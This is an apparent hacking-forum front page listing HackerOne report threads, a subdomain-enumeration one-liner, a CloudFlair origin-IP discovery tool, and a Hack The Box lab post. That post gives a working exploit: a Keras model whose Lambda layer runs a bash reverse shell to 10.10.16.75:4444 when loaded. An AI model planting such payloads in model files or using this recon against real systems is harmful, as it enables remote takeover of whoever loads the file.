Online Users
There are currently 2 online users.» 0 Member(s) | 2 Guest(s)
Latest Threads
HackerOne Disclosed Repor...
Forum: Research Papers/Vulnerability reports
Last Post: hashXploiter
01-27-2026, 12:30 PM
» Replies: 0
» Views: 21
HackerOne Disclosed Repor...
Forum: Research Papers/Vulnerability reports
Last Post: hashXploiter
01-22-2026, 12:30 PM
» Replies: 0
» Views: 44
HackerOne Disclosed Repor...
Forum: Research Papers/Vulnerability reports
Last Post: hashXploiter
01-21-2026, 12:30 PM
» Replies: 0
» Views: 50
HackerOne Disclosed Repor...
Forum: Research Papers/Vulnerability reports
Last Post: hashXploiter
01-20-2026, 12:30 PM
» Replies: 0
» Views: 59
HackerOne Disclosed Repor...
Forum: Research Papers/Vulnerability reports
Last Post: hashXploiter
01-19-2026, 12:30 PM
» Replies: 0
» Views: 64
HackerOne Disclosed Repor...
Forum: Research Papers/Vulnerability reports
Last Post: hashXploiter
01-17-2026, 12:30 PM
» Replies: 0
» Views: 66
HackerOne Disclosed Repor...
Forum: Research Papers/Vulnerability reports
Last Post: hashXploiter
01-16-2026, 12:30 PM
» Replies: 0
» Views: 63
HackerOne Disclosed Repor...
Forum: Research Papers/Vulnerability reports
Last Post: hashXploiter
01-15-2026, 12:30 PM
» Replies: 0
» Views: 69
HackerOne Disclosed Repor...
Forum: Research Papers/Vulnerability reports
Last Post: hashXploiter
01-13-2026, 12:30 PM
» Replies: 0
» Views: 64
HackerOne Disclosed Repor...
Forum: Research Papers/Vulnerability reports
Last Post: hashXploiter
01-08-2026, 12:30 PM
» Replies: 0
» Views: 85
subfinder with shuffledns!
Web & Bug Bounty
No Replies
hashXploiter , 10-16-2025, 10:32 AM
Find more subdomains by combining subfinder with shuffledns!
shuffledns -mode bruteforce -d <target> -w <words> -r <resolvers> | anew subs.txt && subfinder -d <target> | anew subs.txt
Install subfinder now ?
You are not allowed to view links. Register or Login to view.
Install shuffleDNS ?
You are not allowed to view links. Register or Login to view.
Open Thread
Reply
Artificial HTB Discussion
Red Team Labs
No Replies
hashXploiter , 08-13-2025, 05:12 PM
Exploit for initial foothold
Code:
# exploit code
import tensorflow as tf
def exploit(i):
import os
os.system("bash -c 'bash -i >& /dev/tcp/10.10.16.75/4444 0>&1'")
return i
model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("rev.h5")
Open Thread
Reply
CloudFlair - find original IP/server behind CloudFlare
Web & Bug Bounty
No Replies
hashXploiter , 08-07-2025, 05:53 PM
CloudFlair is a tool to find origin servers of websites protected by CloudFlare (or CloudFront) which are publicly exposed and don't appropriately restrict network access to the relevant CDN IP ranges.
The tool uses Internet-wide scan data from Censys to find exposed IPv4 hosts presenting an SSL certificate associated with the target's domain name. API keys are required and can be retrieved from your Censys account.
Link : You are not allowed to view links. Register or Login to view.
Open Thread
Reply